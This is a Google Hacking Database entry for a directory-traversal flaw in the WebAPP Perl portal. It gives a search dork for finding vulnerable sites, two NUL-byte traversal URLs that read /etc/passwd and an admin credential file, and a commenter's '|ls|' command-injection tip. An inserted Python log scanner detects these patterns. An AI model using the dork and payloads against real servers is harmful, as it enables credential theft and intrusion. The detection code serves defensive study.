GHDB « Hackers For Charity

GHDB

Google Search: inurl:/cgi-bin/index.cgi inurl:topics inurl:viewca

plaztic rates this entry 8 out of 10.
Submitted: 2004-09-07 00:00:00
Added by: plaztic
Hits: 3775
Score: 8

WebAPP is advertised as the internet’s most feature rich, easy to run PERL based portal system. The WebAPP system has a serious reverse directory traversal vulnerability:

http:///cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00
http:///cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00

Detailed info: http://www.packetstormsecurity.com/0408-exploits/webapp.traversal.txt

Credit goes to PhTeam for discovering this vulnerability.
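For defenders reviewing web server logs, the following added example (not part of the original entry) flags requests to /cgi-bin/index.cgi whose viewcat parameter carries a parent-directory segment, a NUL byte, or a pipe character. The log format, the sample lines, and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Constructed sample access-log lines (not real traffic); addresses are documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Sep/2004:10:00:01 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=news HTTP/1.0" 200 5120',
    '192.0.2.44 - - [07/Sep/2004:10:00:09 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../../../../../../etc/passwd%00 HTTP/1.0" 200 1432',
    '192.0.2.44 - - [07/Sep/2004:10:00:15 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=../../db/members/admin.dat%00 HTTP/1.0" 200 211',
    '192.0.2.71 - - [07/Sep/2004:10:01:02 +0000] "GET /cgi-bin/index.cgi?action=topics&viewcat=%7Cls%7C HTTP/1.0" 200 300',
    '192.0.2.10 - - [07/Sep/2004:10:02:00 +0000] "GET /cgi-bin/index.cgi?action=forum&board=general HTTP/1.0" 200 900',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_decode(value, max_rounds=3):
    """Percent-decode until the value stops changing (bounded number of rounds)."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def check_line(line):
    """Return the reasons a log line looks suspicious; empty list if it is clean."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    if not url.path.endswith("/cgi-bin/index.cgi"):
        return []
    reasons = []
    for raw in parse_qs(url.query, keep_blank_values=True).get("viewcat", []):
        value = fully_decode(raw)
        # Drop NULs before splitting so "..\x00" still counts as a ".." segment.
        if ".." in re.split(r"[\\/]", value.replace("\x00", "")):
            reasons.append("parent-directory segment")
        if "\x00" in value:
            reasons.append("NUL byte")
        if "|" in value:
            reasons.append("pipe character")
    return reasons

def scan(lines):
    """Return (line index, reasons) for every suspicious line."""
    return [(i, r) for i, line in enumerate(lines) if (r := check_line(line))]
```

The same three checks can serve as server-side input validation for viewcat: a category name that fails any of them should be rejected before it reaches a file path.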


Comments:

2005-09-01 12:15:19 (sapheal): old stuff but working ;) som3tim3s u might want to use this: |ls|
whose n00bs not involved: read bout piping commands in *nix
ps.also read bout NULL byte poison (\0).. this is a very specific command

shoutz



5 Responses to “GHDB”

  1. Jack says:

    Does GHDB still update now?

  2. Johnny says:

    The GHDB is alive and well, updated through the ExploitDB: http://www.exploit-db.com/google-dorks.

  3. The Artist says:

    Hi Johnny, been a while since I’ve come last. Aren’t you gonna update this website anymore???

  4. Johnny says:

    The GHDB is not updated and lives with the exploitdb: http://www.exploit-db.com. Please check out the awesome folks at Offensive Security as well: http://www.offensive-security.com!

  5. Velmurugan says:

    Are any offline viewable resources available for this product?
